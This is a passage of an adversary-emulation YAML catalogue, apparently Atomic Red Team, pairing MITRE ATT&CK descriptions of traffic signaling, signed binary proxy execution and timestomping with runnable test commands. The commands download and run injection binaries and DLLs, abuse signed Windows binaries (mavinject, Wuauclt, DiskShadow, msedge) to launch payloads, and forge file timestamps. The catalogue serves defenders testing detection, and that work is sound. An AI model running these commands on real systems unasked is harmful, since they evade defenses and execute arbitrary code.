New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/uuid_injection.exe" -OutFile "#{exe_binary}"
executor:
command: |-
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
Stop-Process -Force
name: powershell
elevation_required: true
T1205:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
created: '2018-04-18T17:59:24.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1205
external_id: T1205
- source_name: Bleeping Computer - Ryuk WoL
description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan
To Encrypt Offline Devices. Retrieved February 11, 2021.
url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/
- source_name: AMD Magic Packet
description: AMD. (1995, November 1). Magic Packet Technical White Paper.
Retrieved February 17, 2021.
url: https://www.amd.com/system/files/TechDocs/20213.pdf
- source_name: Mandiant - Synful Knock
description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
Knock - A Cisco router implant - Part I. Retrieved November 17, 2024.
url: https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/
- source_name: Cisco Synful Knock Evolution
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
- source_name: Hartrell cd00r 2002
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
- source_name: Cisco Blog Legacy Device Attacks
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
- source_name: GitLab WakeOnLAN
description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February
17, 2021.
url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:43.225Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.
Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tony Lee
- Josh Day, Gigamon
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Network Devices
- Windows
x_mitre_version: '2.5'
atomic_tests: []
T1218:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--457c7820-d331-465a-915e-42f85500ccc4
created: '2018-04-18T17:59:24.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218
external_id: T1218
- source_name: GTFO split
description: GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.
url: https://gtfobins.github.io/gtfobins/split/
- source_name: LOLBAS Project
description: Oddvar Moe et al. (2022, February). Living Off The Land Binaries,
Scripts and Libraries. Retrieved March 7, 2022.
url: https://github.com/LOLBAS-Project/LOLBAS#criteria
- source_name: split man page
description: Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1)
— Linux manual page. Retrieved March 25, 2022.
url: https://man7.org/linux/man-pages/man1/split.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:43.406Z'
name: Signed Binary Proxy Execution
description: |-
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Nishan Maharjan, @loki248
- Hans Christoffer Gaardløs
- Praetorian
- Wes Hurd
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
x_mitre_version: '3.2'
identifier: T1218
atomic_tests:
- name: mavinject - Inject DLL into running process
auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61
description: 'Injects arbitrary DLL into running process specified by process
ID. Requires Windows 10.
'
supported_platforms:
- windows
input_arguments:
process_id:
description: PID of process receiving injection
type: string
default: '1000'
dll_payload:
description: DLL to inject
type: path
default: PathToAtomicsFolder\T1218\src\x64\T1218.dll
dependency_executor_name: powershell
dependencies:
- description: 'T1218.dll must exist on disk at specified location (#{dll_payload})
'
prereq_command: 'if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
executor:
command: 'mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}"
'
name: command_prompt
elevation_required: true
- name: Register-CimProvider - Execute evil dll
auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
note this dll can be served up via SMB
'
supported_platforms:
- windows
input_arguments:
dll_payload:
description: DLL to execute
type: path
default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
dependency_executor_name: powershell
dependencies:
- description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload})
'
prereq_command: 'if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
executor:
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}"
'
name: command_prompt
- name: InfDefaultInstall.exe .inf Execution
auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
description: |
Test execution of a .inf using InfDefaultInstall.exe
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
supported_platforms:
- windows
input_arguments:
inf_to_execute:
description: Local location of inf file
type: string
default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf
dependency_executor_name: powershell
dependencies:
- description: 'INF file must exist on disk at specified location (#{inf_to_execute})
'
prereq_command: 'if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
executor:
command: 'InfDefaultInstall.exe "#{inf_to_execute}"
'
name: command_prompt
- name: ProtocolHandler.exe Downloaded a Suspicious File
auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2
description: 'Emulates attack via documents through protocol handler in Microsoft
Office. On successful execution you should see Microsoft Word launch a blank
file.
'
supported_platforms:
- windows
input_arguments:
remote_url:
description: url to document
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft Word must be installed
'
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
Stop-Process -Name "winword"
exit 0 } catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
'
executor:
name: command_prompt
elevation_required: false
command: |
FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
- name: Microsoft.Workflow.Compiler.exe Payload Execution
auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a
.Net assembly that launches calc.exe
'
supported_platforms:
- windows
input_arguments:
xml_payload:
description: XML to execution
type: path
default: PathToAtomicsFolder\T1218\src\T1218.xml
mwcpath:
description: Default location of Microsoft.Workflow.Compiler.exe
type: path
default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname:
description: Default name of microsoft.workflow.compiler.exe
type: path
default: microsoft.workflow.compiler.exe
dependency_executor_name: powershell
dependencies:
- description: ".Net must be installed for this test to work correctly.\n"
prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit
1}
'
get_prereq_command: 'write-host ".Net must be installed for this test to work
correctly."
'
executor:
command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt
'
name: powershell
elevation_required: false
- name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911
description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe
running a .Net assembly that launches calc.exe
'
supported_platforms:
- windows
input_arguments:
xml_payload:
description: XML to execution
type: path
default: PathToAtomicsFolder\T1218\src\T1218.xml
renamed_binary:
description: renamed Microsoft.Workflow.Compiler
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\svchost.exe
mwcpath:
description: Default location of Microsoft.Workflow.Compiler.exe
type: path
default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname:
description: Default name of microsoft.workflow.compiler.exe
type: path
default: microsoft.workflow.compiler.exe
dependency_executor_name: powershell
dependencies:
- description: ".Net must be installed for this test to work correctly.\n"
prereq_command: 'if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
executor:
command: '&"#{renamed_binary}" "#{xml_payload}" output.txt
'
name: powershell
elevation_required: false
- name: Invoke-ATHRemoteFXvGPUDisablementCommand base test
auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db
description: |
RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).
One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.
Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.
The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.
Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
supported_platforms:
- windows
input_arguments:
module_name:
description: Specifies a temporary module name to use. If -ModuleName is
not supplied, a 16-character random temporary module name is used. A PowerShell
module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses
module load order, a module name must be specified.
type: string
default: foo
module_path:
description: Specifies an alternate, non-default PowerShell module path
for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the
first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules.
type: string
default: "$PWD"
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name}
-ModulePath #{module_path}'
name: powershell
- name: DiskShadow Command Execution
auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa
description: 'Emulates attack with a DiskShadow.exe (LOLBIN installed by default
on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
'
supported_platforms:
- windows
input_arguments:
txt_payload:
description: txt to execute
type: path
default: PathToAtomicsFolder\T1218\src\T1218.txt
dspath:
description: Default location of DiskShadow.exe
type: path
default: C:\Windows\System32\diskshadow.exe
dependency_executor_name: powershell
dependencies:
- description: txt file must exist on disk at specified location (#{txt_payload})
prereq_command: 'if (Test-Path "#{txt_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{txt_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
- description: DiskShadow.exe must exist on disk at specified location (#{dspath})
prereq_command: 'if (Test-Path #{dspath}) {exit 0} else {exit 1}
'
get_prereq_command: 'echo "DiskShadow.exe not found on disk at expected location"
'
executor:
command: "#{dspath} -S #{txt_payload} \n"
name: powershell
elevation_required: false
- name: Load Arbitrary DLL via Wuauclt (Windows Update Client)
auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8
description: "This test uses Wuauclt to load an arbitrary DLL. Upon execution
with the default inputs, calculator.exe will be launched. \nSee https://dtm.uk/wuauclt/\n"
supported_platforms:
- windows
input_arguments:
arbitrary_dll:
description: Path of DLL to be loaded
type: string
default: PathToAtomicsFolder\T1218\bin\calc.dll
dependency_executor_name: powershell
dependencies:
- description: 'DLL to load must exist on disk as specified location (#{arbitrary_dll})
'
prereq_command: 'if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{arbitrary_dll}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
executor:
command: 'wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer
'
cleanup_command: taskkill /f /im calculator.exe > nul 2>&1
name: command_prompt
- name: Lolbin Gpscript logon option
auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c
description: |
Executes logon scripts configured in Group Policy.
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
supported_platforms:
- windows
executor:
command: 'Gpscript /logon
'
name: command_prompt
- name: Lolbin Gpscript startup option
auto_generated_guid: f8da74bb-21b8-4af9-8d84-f2c8e4a220e3
description: |
Executes startup scripts configured in Group Policy
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
supported_platforms:
- windows
executor:
command: 'Gpscript /startup
'
name: command_prompt
- name: Lolbas ie4uinit.exe use as proxy
auto_generated_guid: 13c0804e-615e-43ad-b223-2dfbacd0b0b3
description: |
Executes commands from a specially prepared ie4uinit.inf file.
Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/
supported_platforms:
- windows
input_arguments:
Path_inf:
description: Path to the cab file
type: path
default: PathToAtomicsFolder\T1218\src\ieuinit.inf
Path_ie4uinit:
description: Path to ie4uinit.exe
type: path
default: c:\windows\system32\ie4uinit.exe
dependency_executor_name: powershell
dependencies:
- description: 'ieuinit.inf must exist on disk at specified location (#{Path_inf})
'
prereq_command: 'if (Test-Path "#{Path_inf}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{Path_inf}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf" -OutFile "#{Path_inf}"
executor:
command: |
copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe
copy "#{Path_inf}" %TEMP%\ieuinit.inf
%TEMP%\ie4uinit.exe -BaseSettings
cleanup_command: |
del %TEMP%\ie4uinit.exe >nul 2>&1
del %TEMP%\ieuinit.inf >nul 2>&1
name: command_prompt
- name: LOLBAS CustomShellHost to Spawn Process
auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe
description: |
This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
Upon execution, customshellhost.exe will spawn calc.exe.
Note this will only work on Windows 10 or 11.
[LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
[BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
supported_platforms:
- windows
input_arguments:
dest_path:
description: Directory to copy files into
type: path
default: C:\test
executor:
command: |
if (-not (Test-Path #{dest_path})) {
New-Item -Path #{dest_path} -ItemType Directory
} else {
Write-Host "Directory #{dest_path} already exists." }
Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
#{dest_path}\customshellhost.exe
cleanup_command: 'Remove-Item -Path #{dest_path} -Recurse -Force
'
name: powershell
elevation_required: true
- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
auto_generated_guid: ab76e34f-28bf-441f-a39c-8db4835b89cc
description: |
Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
- https://twitter.com/0gtweet/status/1674399582162153472
- https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
Registry keys are deleted after successful execution.
supported_platforms:
- windows
executor:
command: |
reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
c:\windows\system32\provlaunch.exe LOLBin
name: command_prompt
- name: LOLBAS Msedge to Spawn Process
auto_generated_guid: e5eedaed-ad42-4c1e-8783-19529738a349
description: |
Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe
- https://lolbas-project.github.io/lolbas/Binaries/Msedge/
supported_platforms:
- windows
executor:
command: |
$edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
if (Test-Path $edgePath64) {
$edgePath = $edgePath64
} else {
# Check 32-bit Edge installation path
$edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
if (Test-Path $edgePath32) {
$edgePath = $edgePath32
} else {
exit 1
}
}
& $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"
sleep 5
taskkill -f -im msedge.exe
taskkill -f -im calc.exe
taskkill -f -im win32calc.exe
name: powershell
- name: System Binary Proxy Execution - Wlrmdr Lolbin
auto_generated_guid: 7816c252-b728-4ea6-a683-bd9441ca0b71
description: Use wlrmdr(Windows Logon Reminder executable) as a proxy binary
to evade defensive countermeasures
supported_platforms:
- windows
input_arguments:
payload_path:
description: Path to the executable
type: String
default: C:\Windows\System32\calc.exe
executor:
command: wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u "#{payload_path}"
name: powershell
elevation_required: false
T1070.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
created: '2020-01-31T12:42:44.103Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1070/006
external_id: T1070.006
- source_name: Juniper Networks ESXi Backdoor 2022
description: Asher Langton. (2022, December 9). A Custom Python Backdoor for
VMWare ESXi Servers. Retrieved March 26, 2025.
url: https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers
- source_name: WindowsIR Anti-Forensic Techniques
description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
of Anti-Forensics Techniques. Retrieved June 3, 2016.'
url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- source_name: Inversecos Linux Timestomping
description: 'inversecos. (2022, August 4). Detecting Linux Anti-Forensics:
Timestomping. Retrieved March 26, 2025.'
url: https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html
- source_name: Inversecos Timestomping 2022
description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
Detection – NTFS Forensics. Retrieved September 30, 2024.'
url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
- source_name: Magnet Forensics
description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
- source_name: Double Timestomping
description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
url: https://x.com/matthewdunwoody/status/1519846657646604289
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:43.937Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
In Windows systems, both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
In Linux systems and on ESXi servers, threat actors may attempt to perform timestomping using commands such as `touch -a -m -t ` (which sets access and modification times to a specific value) or `touch -r ` (which sets access and modification times to match those of another file).(Citation: Inversecos Linux Timestomping)(Citation: Juniper Networks ESXi Backdoor 2022)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Romain Dumont, ESET
- Mike Hartley @mikehartley10
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Windows
x_mitre_version: '1.2'
identifier: T1070.006
atomic_tests:
- name: Set a file's access timestamp
auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810
description: 'Stomps on the access timestamp of a file
'
supported_platforms:
- linux
- macos
input_arguments:
target_filename:
description: Path of file that we are going to stomp on last access time
type: path
default: "/tmp/T1070.006-access.txt"
dependencies:
- description: 'The file must exist in order to be timestomped
'
prereq_command: 'test -e #{target_filename} && exit 0 || exit 1
'
get_prereq_command: 'echo ''T1070.006 file access timestomp test'' > #{target_filename}
'
executor:
command: 'touch -a -t 197001010000.00 #{target_filename}
'
cleanup_command: 'rm -f #{target_filename}
'
name: sh
- name: Set a file's modification timestamp
auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52
description: 'Stomps on the modification timestamp of a file
'
supported_platforms:
- linux
- macos
input_arguments:
target_filename:
description: Path of file that we are going to stomp on last access time
type: path
default: "/tmp/T1070.006-modification.txt"
dependencies:
- description: 'The file must exist in order to be timestomped
'
prereq_command: 'test -e #{target_filename} && exit 0 || exit 1
'
get_prereq_command: 'echo ''T1070.006 file modification timestomp test'' >
#{target_filename}
'
executor:
command: 'touch -m -t 197001010000.00 #{target_filename}
'
cleanup_command: 'rm -f #{target_filename}
'
name: sh
- name: Set a file's creation timestamp
auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
description: |
Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
supported_platforms:
- linux
- macos
input_arguments:
target_filename:
description: Path of file that we are going to stomp on last access time
type: path
default: "/tmp/T1070.006-creation.txt"
executor:
elevation_required: true
command: |
NOW=$(date +%m%d%H%M%Y)
date 010100001971
touch #{target_filename}
date "$NOW"
stat #{target_filename}
cleanup_command: 'rm -f #{target_filename}
'
name: sh
- name: Modify file timestamps using reference file
auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50
description: |
Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- linux
- macos
input_arguments:
target_file_path:
description: Path of file to modify timestamps of
type: path
default: "/tmp/T1070.006-reference.txt"
reference_file_path:
description: Path of reference file to read timestamps from
type: path
default: "/bin/sh"
executor:
command: |
touch #{target_file_path}
touch -acmr #{reference_file_path} #{target_file_path}
cleanup_command: 'rm -f #{target_file_path}
'
name: sh
- name: Windows - Modify file creation timestamp with PowerShell
auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c
description: |
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
supported_platforms:
- windows
input_arguments:
target_date_time:
description: Date/time to replace original timestamps with
type: string
default: 01/01/1970 00:00:00
file_path:
description: Path of file to change creation timestamp
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt
dependency_executor_name: powershell
dependencies:
- description: 'A file must exist at the path (#{file_path}) to change the creation
time on
'
